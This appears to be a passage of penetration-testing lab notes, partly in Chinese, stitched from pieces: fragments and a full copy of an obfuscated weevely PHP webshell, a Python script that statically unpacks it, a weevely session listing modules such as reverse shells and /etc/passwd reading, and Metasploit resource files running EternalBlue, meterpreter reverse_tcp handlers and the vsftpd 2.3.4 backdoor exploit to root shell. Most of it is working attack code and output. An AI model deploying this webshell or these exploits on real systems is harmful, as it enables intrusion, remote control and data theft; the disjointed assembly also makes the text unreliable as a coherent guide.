$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>
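As an added example (not part of these notes or of weevely), a Python script that statically unpacks the loader above without executing it: it replays the `str_replace` and concatenation steps to recover `create_function` and the real body, lists the indicator functions a scanner would key on, and checks whether the embedded key constants are md5 of the password from the `weevely generate` line. The sample it analyses is the testweb.php from this page.

```python
import hashlib
import re

# Sample to analyse: the testweb.php weevely generated on this page, embedded
# verbatim (extraction debris removed, one statement per line).
WEBSHELL = r"""<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>"""

# The three statement shapes this loader is built from.
LITERAL = re.compile(r"\$(\w+)='([^']*)';")                                    # $x='...';
REPLACE = re.compile(r"\$(\w+)=str_replace\('([^']*)','([^']*)',([^;]*)\);")   # $x=str_replace(a,b,expr);
CALL = re.compile(r"\$(\w+)=\$(\w+)\('',\$(\w+)\);\s*\$\1\(\);")               # $h=$R('',$J);$h();
OPERAND = re.compile(r"\$\w+|'[^']*'")                                         # pieces of a '.' concatenation

# Functions whose presence in the reconstructed body marks a PHP loader/backdoor.
SUSPICIOUS = ("create_function", "eval(", "gzuncompress(", "base64_decode(",
              "php://input", "preg_match(")


def eval_concat(expr, env):
    """Evaluate a PHP '.' concatenation of $variables and 'literals'."""
    return "".join(env[t[1:]] if t.startswith("$") else t[1:-1]
                   for t in OPERAND.findall(expr))


def resolve(src):
    """Replay the assignments in source order; str_replace is applied statically."""
    env = {}
    stmts = [(m.start(), "lit", m) for m in LITERAL.finditer(src)]
    stmts += [(m.start(), "rep", m) for m in REPLACE.finditer(src)]
    for _, kind, m in sorted(stmts, key=lambda s: s[0]):
        if kind == "lit":
            env[m.group(1)] = m.group(2)
        else:
            name, search, repl, subject = m.groups()
            env[name] = eval_concat(subject, env).replace(search, repl)
    return env


def analyze(src):
    """Return the function factory used, the reconstructed body and indicator hits."""
    env = resolve(src)
    call = CALL.search(src)
    if not call:
        return {"factory": None, "body": None, "indicators": []}
    _, factory_var, body_var = call.groups()
    factory, body = env[factory_var], env[body_var]
    return {"factory": factory, "body": body,
            "indicators": [s for s in SUSPICIOUS if s == factory or s in body]}


def recover_key(body, password):
    """Concatenate the $k/$kh/$kf constants and compare them with md5(password).

    In this sample the three constants join to md5('123456'), the password on the
    `weevely generate` line, which ties a recovered shell to the password used.
    """
    consts = dict(re.findall(r'\$(kh|kf|k)="([0-9a-f]+)"', body))
    joined = consts["k"] + consts["kh"] + consts["kf"]
    return joined, joined == hashlib.md5(password.encode()).hexdigest()


if __name__ == "__main__":
    report = analyze(WEBSHELL)
    print("factory :", report["factory"])
    print("hits    :", ", ".join(report["indicators"]))
    print("body    :", report["body"][:120], "...")
    print("key     :", recover_key(report["body"], "123456"))
```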
# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456

[+] weevely 4.0.1

[+] Target:     192.168.0.150:8100
[+] Session:    /root/.weevely/sessions/192.168.0.150/testweb_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> help

 :file_rm                      Remove remote file.
 :file_clearlog                Remove string from a file.
 :file_edit                    Edit remote file on a local editor.
 :file_bzip2                   Compress or expand bzip2 files.
 :file_upload                  Upload file to remote filesystem.
 :file_download                Download file from remote filesystem.
 :file_ls                      List directory content.
 :file_webdownload             Download an URL.
 :file_cp                      Copy single file.
 :file_find                    Find files with given names and attributes.
 :file_enum                    Check existence and permissions of a list of paths.
 :file_tar                     Compress or expand tar archives.
 :file_touch                   Change file timestamp.
 :file_zip                     Compress or expand zip files.
 :file_mount                   Mount remote filesystem using HTTPfs.
 :file_gzip                    Compress or expand gzip files.
 :file_cd                      Change current working directory.
 :file_upload2web              Upload file automatically to a web folder and get corresponding URL.
 :file_read                    Read remote file from the remote filesystem.
 :file_grep                    Print lines matching a pattern in multiple files.
 :file_check                   Get attributes and permissions of a file.
 :shell_sh                     Execute shell commands.
 :shell_php                    Execute PHP commands.
 :shell_su                     Execute commands with su.
 :sql_dump                     Multi dbms mysqldump replacement.
 :sql_console                  Execute SQL query or run console.
 :system_extensions            Collect PHP and webserver extension list.
 :system_info                  Collect system information.
 :system_procs                 List running processes.
 :audit_filesystem             Audit the file system for weak permissions.
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd              Read /etc/passwd with different techniques.
 :audit_suidsgid               Find files with SUID or SGID flags.
 :audit_phpconf                Audit PHP configuration.
 :bruteforce_sql               Bruteforce SQL database.
 :backdoor_tcp                 Spawn a shell on a TCP port.
 :backdoor_reversetcp          Execute a reverse TCP shell.
 :net_scan                     TCP Port scan.
 :net_proxy                    Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig                 Get network interfaces addresses.
 :net_curl                     Perform a curl-like HTTP request.
 :net_mail                     Send mail.
 :net_phpproxy                 Install PHP proxy on the target.

DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+----------------------------------------------------------------------------------+
| document_root      | C:/xampp/htdocs                                                                  |
| whoami             |                                                                                  |
| hostname           | DESKTOP-9A8VFKB                                                                  |
| pwd                | C:\xampp\htdocs\sec\19                                                           |
| open_basedir       |                                                                                  |
| safe_mode          | False                                                                            |
| script             | /sec/19/testweb.php                                                              |
| script_folder      | C:\xampp\htdocs\sec\19                                                           |
| uname              | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586  |
| os                 | Windows NT                                                                       |
| client_ip          | 192.168.0.150                                                                    |
| max_execution_time | 30                                                                               |
| php_self           | /sec/19/testweb.php                                                              |
| dir_sep            | \                                                                                |
| php_version        | 5.6.28                                                                           |
+--------------------+----------------------------------------------------------------------------------+

DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' 不是内部或外部命令，也不是可运行的程序或批处理文件。
Resource Files
The most basic resource file
# echo version > resource.rc
# echo "load sounds" >> resource.rc
# msfconsole -r resource.rc
…
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >
Resource file for attacking Windows 7
windows7.rc
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.155
run
# msfconsole -r windows7.rc …
Resource file for attacking Windows 10
windows10.rc
use exploit/multi/handler
set lhost 192.168.0.150
set lport 8888
set payload windows/meterpreter/reverse_tcp
run
# msfconsole -r windows10.rc …
Resource file for attacking Android
android.rc
use exploit/multi/handler
set lhost 192.168.0.150
set lport 9999
set payload android/meterpreter/reverse_tcp
run
# msfconsole -r android.rc …
Penetrating Linux
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800